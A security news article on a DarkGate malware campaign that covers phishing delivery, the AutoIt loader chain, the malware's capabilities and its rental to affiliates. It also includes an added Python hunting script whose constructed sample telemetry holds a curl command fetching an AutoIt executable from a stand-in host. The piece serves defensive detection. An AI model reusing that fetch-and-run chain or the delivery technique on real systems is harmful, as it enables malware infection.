The Cyber Security News
DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates

August 29, 2023

A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate.

“The current increase in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates,” Telekom Security said in a report published last week.

The latest findings build on recent findings from security researcher Igal Lytzki, who detailed a “high volume campaign” that leverages hijacked email threads to trick recipients into downloading the malware.


The attack begins with a phishing URL that, when clicked, passes through a traffic direction system (TDS) that takes the victim to an MSI payload only if certain conditions are met. One of these conditions is the presence of a Refresh header in the HTTP response.

Opening the MSI file triggers a multi-stage process that uses an AutoIt script to execute shellcode; the shellcode acts as a conduit to decrypt and launch DarkGate by means of a crypter (or loader).

Specifically, the loader is designed to parse the AutoIt script and extract the encrypted malware sample embedded in it.


An alternate version of the attacks has been observed using a Visual Basic Script in place of an MSI file, which, in turn, uses cURL to retrieve the AutoIt executable and the script file. The exact method by which the VB Script is delivered is currently unknown.
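Both delivery variants described above (MSI dropping an AutoIt script, and VBS fetching the AutoIt interpreter with cURL) share the same observable on the endpoint: the AutoIt3 interpreter executing a script from a user-writable location, spawned by an installer or a script host. The following is an added example of a hunt over process-creation telemetry; it is not code from the original article or from Telekom Security. The event records, paths, PIDs and the URL are constructed, and the field names are an assumption modelled on Sysmon Event ID 1 rather than any specific product's schema.

```python
"""Hunt for the DarkGate-style AutoIt loader chain in process-creation logs.

Added example, not from the original article. Sample events below are
constructed to resemble Sysmon Event ID 1 / EDR process-creation records;
field names, paths, PIDs and the download URL are all hypothetical.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# Directories a standard user can write to; a legitimate AutoIt install lives
# under Program Files, so an interpreter or script here is suspicious.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)"
    r"|ProgramData|Users\\Public|Windows\\Temp)\\",
    re.I,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
INSTALLERS = {"msiexec.exe"}

# Constructed sample telemetry (hypothetical): one MSI-based chain, one
# VBS+cURL chain, and one benign developer use of AutoIt for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\u\Downloads\invoice.msi"'),
    ProcEvent(300, 200, r"C:\Users\u\AppData\Local\Temp\Autoit3.exe",
              r"Autoit3.exe C:\Users\u\AppData\Local\Temp\script.au3"),
    ProcEvent(400, 100, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\u\Downloads\doc.vbs"),
    ProcEvent(500, 400, r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\u\AppData\Roaming\Autoit3.exe http://example.invalid/a3"),
    ProcEvent(600, 400, r"C:\Users\u\AppData\Roaming\Autoit3.exe",
              r"Autoit3.exe C:\Users\u\AppData\Roaming\s.au3"),
    ProcEvent(700, 100, r"C:\Program Files\AutoIt3\AutoIt3.exe",
              r"AutoIt3.exe C:\dev\build.au3"),  # benign: installed copy, dev script
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def find_loader_chain(events):
    """Return (pid, rule) findings for events matching the loader pattern.

    Rules:
      * AutoIt interpreter or its script located in a user-writable directory.
      * AutoIt interpreter spawned directly by msiexec or a Windows script host
        (the MSI variant and the VBS variant respectively).
      * curl.exe spawned by a script host (the VBS variant's download step).
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name == "autoit3.exe":
            if is_user_writable(e.image) or is_user_writable(e.cmdline):
                findings.append((e.pid, "autoit_from_user_writable_path"))
            if pname in INSTALLERS or pname in SCRIPT_HOSTS:
                findings.append((e.pid, f"autoit_spawned_by_{pname}"))
        elif name == "curl.exe" and pname in SCRIPT_HOSTS:
            findings.append((e.pid, f"curl_spawned_by_{pname}"))
    return findings


if __name__ == "__main__":
    for pid, rule in find_loader_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent-process rule is the stronger signal: a legitimately installed AutoIt3 interpreter is launched from Explorer or a shell, not from `msiexec.exe` or `wscript.exe`. The user-writable-path rule catches the case where the parent relationship was lost (for example, an intermediate process that exited before telemetry was collected), at the cost of flagging portable AutoIt installs, so it is better used as a hunting query than as a blocking rule.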

DarkGate, sold primarily on underground forums by an actor named RastaFarEye, comes with capabilities to evade detection by security software, set up persistence using Windows Registry changes, escalate privileges, and steal data from web browsers and other software such as Discord and FileZilla.

It also establishes contact with a command-and-control (C2) server for enumerating files, exfiltrating data, launching cryptocurrency miners, and remotely capturing screenshots, as well as running other commands.


The malware is offered as a subscription, priced from $1,000 per day to $15,000 per month to $100,000 a year, with the author advertising it as the “ultimate tool for pentesters/redteamers” that has “features that you won't find anywhere.” Interestingly, earlier versions of DarkGate also came equipped with a ransomware module.

Phishing attacks are a primary delivery pathway for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, and others, with threat actors constantly adding new features and enhancements to expand their functionality.

According to a new report published by HP Wolf Security, email remained the top vector for delivering malware to endpoints, accounting for 79% of threats identified in Q2 2023.



Some components of this posting are sourced from:
thehackernews.com

Copyright © TheCyberSecurity.News, All Rights Reserved.